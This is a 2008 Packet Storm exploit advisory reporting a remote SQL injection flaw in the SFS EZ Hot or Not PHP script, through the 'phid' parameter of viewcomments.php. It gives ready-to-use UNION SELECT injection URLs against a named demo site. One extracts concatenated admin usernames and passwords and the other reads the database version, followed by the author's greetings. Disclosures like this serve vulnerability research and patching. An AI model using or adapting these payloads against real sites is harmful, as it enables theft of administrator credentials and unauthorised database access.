sfshotornot-sql.txt

2008-11-01T00:00:00
ID PACKETSTORM:71442
Type packetstorm
Reporter d3b4g
Modified 2008-11-01T00:00:00

Description

                                        
                                            ` SFS EZ Hot or Not[viewcomments.php?phid] Remote SQL Injection Vulnerability  
===============================================================  
  
  
----------------------------------------------------------------  
script : SFS EZ Hot ot Not   
  
script : http://www.scripts-for-sites.info  
  
Risk : High  
  
----------------------------------------------------------------  
  
Discovered by : d3b4g  
  
email : bl4ckend[at]gmail[dot]com  
  
Site. www.bl4ck3nd.info  
  
----------------------------------------------------------------  
Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*  
  
  
version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*  
----------------------------------------------------------------  
  
  
----------------------------------------------------------------  
Greetz: str0ke,,Hotlism.org,All my friends  
  
-----------------------------------------------------------------  
Proud to be a maldivian :))  
=======================  
  
----------------------------------------------------------------  
  
`